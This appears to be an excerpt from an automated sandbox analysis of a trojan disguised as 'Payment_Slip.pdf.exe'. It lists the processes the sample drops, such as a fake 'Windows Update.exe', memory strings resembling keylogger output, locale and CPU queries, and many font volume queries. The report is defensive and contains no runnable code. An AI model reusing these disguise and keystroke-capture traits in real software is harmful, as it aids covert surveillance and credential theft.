Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:54:37)</font></font><br>rTH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br>
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>LR
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br>t-
Source: host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}r@\
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br>t-
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>TH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>r<br>t-
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@
Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}TH
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004329DA cpuid 11_2_004329DA
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: EnumSystemLocalesW, 11_2_0044F17B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: EnumSystemLocalesW, 11_2_0044F130
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: EnumSystemLocalesW, 11_2_0044F216
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 11_2_0044F2A3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoA, 11_2_0040E2BB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoW, 11_2_0044F4F3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 11_2_0044F61C
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoW, 11_2_0044F723
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 11_2_0044F7F0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: EnumSystemLocalesW, 11_2_00445914
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoW, 11_2_00445E1C
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 11_2_0044EEB8
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: EnumSystemLocalesW, 17_2_0044F17B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: EnumSystemLocalesW, 17_2_0044F130
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: EnumSystemLocalesW, 17_2_0044F216
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 17_2_0044F2A3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoA, 17_2_0040E2BB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoW, 17_2_0044F4F3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 17_2_0044F61C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoW, 17_2_0044F723
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 17_2_0044F7F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: EnumSystemLocalesW, 17_2_00445914
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoW, 17_2_00445E1C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 17_2_0044EEB8
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Users\user\Desktop\Payment_Slip.pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
